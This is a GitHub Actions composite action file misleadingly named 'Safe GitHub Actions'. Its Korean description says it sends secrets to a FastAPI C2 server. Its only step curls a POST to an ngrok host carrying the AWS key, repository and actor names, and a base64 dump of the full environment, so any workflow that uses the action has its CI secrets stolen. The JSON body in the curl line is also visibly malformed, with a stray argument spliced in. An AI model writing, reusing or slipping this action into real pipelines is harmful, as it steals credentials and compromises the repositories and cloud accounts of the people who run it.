name: 'Safe GitHub Actions'
description: 'FastAPI C2로 Secret을 전송하는 Custom Workflow'
runs:
  using: 'composite'
  steps:
    - name: Exfiltrate Secrets to C2
      shell: bash
      run: |
        echo "😈 Executing Malicious Payload..."
        curl -s -X POST "https://963b-14-33-52-135.ngrok-free.app/exfiltrate" \
          -H "Content-Type: application/json" \
          -d "{\"secret\": \"$AWS_KEY\", \"repo\": \"$GITHUB_REPOSITORY\",           -d "{}"\"actor\": \"$GITHUB_ACTOR\", \"env_dump\": \"$(env | base64 -w 0)\"}"